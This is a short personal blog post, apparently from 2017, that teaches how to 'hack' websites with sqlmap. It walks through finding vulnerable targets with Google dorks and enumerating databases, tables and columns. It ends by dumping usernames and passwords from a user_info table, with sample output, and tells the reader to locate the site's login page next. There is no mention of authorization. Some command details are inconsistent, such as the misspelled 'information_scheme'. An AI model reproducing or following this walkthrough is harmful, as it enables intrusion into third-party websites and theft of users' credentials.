Hello!

здравствуйте

это мой

Ahdeen

адин

January 7, 2017

How to Hack Website Using Sqlmap


Hello google..... today we will discuss about how to hack website using sqlmap



Allright let`s get started...


first... if you using kali linux, sqlmap has been installed.


Now open your terminal


1. you must find your target by using google dork.


2. If you have a your own target without using google dork you can also scan    your target vulnerability by using uniscan or w3af


3. Allright after you have target then open sqlmap on terminal


4. type sqlmap -u http://www.target.com/phd?id=2 --dbs


5. if you success you will see this


[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite



6. Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables


7. You will see this


[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info



8. Allright type Then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns


9. The view just like this


[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump


11. Taraaa Done..... Next your job still running,, you must find target login page.


12. Ok see you on the next post

I have rich experience in security system & internet security. Also I am journalist for technology and other stuff section. Also i love learning a new language. Feel free to contact me writing an email with your project idea.

0 comments:

Post a Comment

e
Contact Me

Adress/Street

Kalimantan street, City of Jember Indonesia

Phone number

+(1) 917-999-5952

Email

ahdeen@bk.ru